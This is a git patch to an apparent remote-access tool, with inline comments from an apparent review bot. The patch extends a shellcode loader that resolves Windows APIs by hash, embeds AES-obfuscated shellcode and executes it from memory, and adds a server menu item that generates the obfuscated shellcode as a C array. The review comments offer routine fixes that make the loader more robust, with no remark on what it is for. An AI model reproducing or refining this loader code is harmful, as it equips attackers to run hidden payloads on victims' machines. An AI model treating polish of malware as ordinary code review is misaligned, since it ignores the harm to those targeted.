From a5f068b03659d71f87441ed489e6ec1ff1a553d9 Mon Sep 17 00:00:00 2001
From: yuanyuanxiang <962914132@qq.com>
Date: Thu, 20 Nov 2025 05:23:28 +0800
Subject: [PATCH] Improve: Add debug code for `SCLoader`

---
 client/SimpleSCLoader.c | 24 ++++++++++++++++++++----
 server/2015Remote/2015Remote.rc | Bin 105466 -> 105622 bytes
 server/2015Remote/2015RemoteDlg.cpp | 7 +++++++
 server/2015Remote/2015RemoteDlg.h | 1 +
 server/2015Remote/resource.h | Bin 55004 -> 55200 bytes
 5 files changed, 28 insertions(+), 4 deletions(-)

diff --git a/client/SimpleSCLoader.c b/client/SimpleSCLoader.c
index 600befd..f792670 100644
--- a/client/SimpleSCLoader.c
+++ b/client/SimpleSCLoader.c
@@ -19,6 +19,9 @@ typedef HMODULE(WINAPI* _LoadLibraryA)(LPCSTR lpLibFileName);
 #define VirtualAlloc_Hash 0x5E893462
 typedef LPVOID(WINAPI* _VirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
+#define VirtualProtect_Hash 1819198468
+typedef BOOL(WINAPI* _VirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
+
 #define Sleep_Hash 1065713747
 typedef VOID(WINAPI* _Sleep)(DWORD dwMilliseconds);
@@ -209,11 +212,21 @@ inline void* mc(void* dest, const void* src, size_t n) {
 // A simple shell code loader.
 // Copy left (c) yuanyuanxiang.
 #ifdef _DEBUG
-int main()
+// Tip: Use menu to generate TinyRun.c.
+#ifdef _WIN64
+#include "../x64/Release/TinyRun.c"
 #else
-int entry()
+#include "../Release/TinyRun.c"
+#endif
+int main(){
+ sc.len = Shellcode_len;
+ if (sc.len > sizeof(sc.data)) return -1;
+ memcpy(sc.data, Shellcode, sc.len);
+ memcpy(sc.aes_iv, "It is a example", 16);
+ memcpy(sc.aes_key, "It is a example", 16);
+#else
+int entry(){
 #endif
-{
 if (!sc.data[0] || !sc.len) return -1;
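Review bot: The `return -1` on the new length check in the debug main() reuses the code that the very next line returns for an empty blob, so a harness cannot tell "embedded shellcode larger than sc.data" from "no shellcode at all"; a distinct value not already used by entry() (the visible one is -3), or at least a comment on that line, would keep the failure codes meaningful. The test key and IV are both the 15-character literal `"It is a example"` plus its NUL terminator, so the 16-byte memcpy is only correct because of the terminator and the key equals the IV — worth a comment next to those two lines such as `// 15 chars + NUL = 16 bytes; debug-only key/IV, never ship this`. The bound check `sc.len > sizeof(sc.data)` is only a real bound if sc.data is an array member; if it is declared as a pointer elsewhere, this compares against the pointer size, which the hunk does not show. The function body continues past the end of this hunk.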
@@ -226,10 +239,13 @@ int entry()
 _GetProcAddress GetProcAddress = (_GetProcAddress)get_proc_address_from_hash(kernel32, GetProcAddress_Hash, 0);
 _LoadLibraryA LoadLibraryA = (_LoadLibraryA)get_proc_address_from_hash(kernel32, LoadLibraryA_Hash, GetProcAddress);
 _VirtualAlloc VirtualAlloc = (_VirtualAlloc)get_proc_address_from_hash(kernel32, VirtualAlloc_Hash, GetProcAddress);
+ _VirtualProtect VirtualProtect = (_VirtualProtect)get_proc_address_from_hash(kernel32, VirtualProtect_Hash, GetProcAddress);
 _Sleep Sleep = (_Sleep)get_proc_address_from_hash(kernel32, Sleep_Hash, GetProcAddress);
- void* exec = VirtualAlloc(NULL, sc.len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+ void* exec = VirtualAlloc(NULL, sc.len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
 if (exec) {
 mc(exec, sc.data, sc.len);
+ DWORD oldProtect = 0;
+ if (!VirtualProtect(exec, sc.len, PAGE_EXECUTE_READ, &oldProtect)) return -3;
 ((void(*)())exec)();
 Sleep(INFINITE);
 }
diff --git a/server/2015Remote/2015Remote.rc b/server/2015Remote/2015Remote.rc
index bc40a8a9853d2a689bd86bf3835ef0c45c2a4d26..f1bafba6f899f01a1027d588210be88dedec4b76 100644
GIT binary patch
delta 57
zcmeyhoo(7qwuUW?%gm?u88d23|6sx>CG5!H$`H&D&)^KijtoIS=r}!)l~H{90S!i( K?UT$IGg1H*IuLgN
delta 27
jcmbQXlkL}bwuUW?%gm>%m@sNg|6sx>wY|lHQ78ofp0Nq{
diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index 7c88cce..915bd04 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -533,6 +533,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
 ON_COMMAND(ID_SHELLCODE_AES_BIN, &CMy2015RemoteDlg::OnShellcodeAesBin)
 ON_COMMAND(ID_SHELLCODE_TEST_AES_BIN, &CMy2015RemoteDlg::OnShellcodeTestAesBin)
 ON_COMMAND(ID_TOOL_RELOAD_PLUGINS, &CMy2015RemoteDlg::OnToolReloadPlugins)
+ ON_COMMAND(ID_SHELLCODE_AES_C_ARRAY, &CMy2015RemoteDlg::OnShellcodeAesCArray)
 END_MESSAGE_MAP()
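Review bot: The newly resolved `VirtualProtect` pointer is called without checking that the hash lookup actually found it, so a miss (a changed hash, or a kernel32 without that export) turns into a call through a null pointer rather than a return code; `if (!VirtualProtect) return -3;` before the VirtualAlloc call would close that, assuming `get_proc_address_from_hash` returns NULL on a miss, which the hunk does not show (the existing pointers are used unchecked too, so this only keeps the new one from adding a crash path). The `return -3` on protection failure also leaves the RW page committed; the process exits anyway, but releasing it with a `VirtualFree` resolved the same way would keep the failure path tidy. Replacing the single PAGE_EXECUTE_READWRITE allocation with RW-then-RX is the right W^X shape and deserves a one-line comment stating the intent, for example `// allocate RW, copy, then flip to RX so the page is never writable and executable at once`; `VirtualProtect_Hash` is also written in decimal while `VirtualAlloc_Hash` is hex, which is worth normalising. The enclosing entry() body starts before this hunk.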
@@ -3336,6 +3337,12 @@ void CMy2015RemoteDlg::OnObfsShellcode()
 shellcode_process(&obfs);
 }
+void CMy2015RemoteDlg::OnShellcodeAesCArray()
+{
+ ObfsAes obfs;
+ shellcode_process(&obfs);
+}
+
 void CMy2015RemoteDlg::OnToolGenShellcodeBin()
 {
diff --git a/server/2015Remote/2015RemoteDlg.h b/server/2015Remote/2015RemoteDlg.h
index fd3d27e..7018775 100644
--- a/server/2015Remote/2015RemoteDlg.h
+++ b/server/2015Remote/2015RemoteDlg.h
@@ -356,4 +356,5 @@ public:
 afx_msg void OnShellcodeAesBin();
 afx_msg void OnShellcodeTestAesBin();
 afx_msg void OnToolReloadPlugins();
+ afx_msg void OnShellcodeAesCArray();
 };
diff --git a/server/2015Remote/resource.h b/server/2015Remote/resource.h
index 9df5ea236e090f9b74752155b1705c8473e0560b..058b576133d597d5639ebf649b14285857abfd3a 100644
GIT binary patch
delta 82
zcmcb!mU+Q?<_#5BChss2n;dXXWOChkHb%3_foD}G|GO$N+2E{{up@&jLoh=;gEJ62 mG6VskB#|?IT$TB7hmaSoV=-9VshM7k;z)uHUR)OULOts
delta 26
kcmV+#0OkLnuLInz1F(41vpm&?0h7+u7?XU~7?bkWuDg2n+a
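Review bot: Nothing in the new OnShellcodeAesCArray handler tells shellcode_process that a C array rather than a .bin file is wanted — its body is just `ObfsAes obfs; shellcode_process(&obfs);` — so either the output format is chosen inside shellcode_process from state not visible here, or this duplicates the existing AES-bin handler and the menu item produces the same file. A one-line comment pinning the intent, `// Emit the AES-obfuscated shellcode as a C array (TinyRun.c) consumed by the _DEBUG build of client/SimpleSCLoader.c`, would make the distinction checkable, and if the format really is selected elsewhere the comment should say where. If the handler is meant to set an output mode on `obfs` before the call, that line is missing.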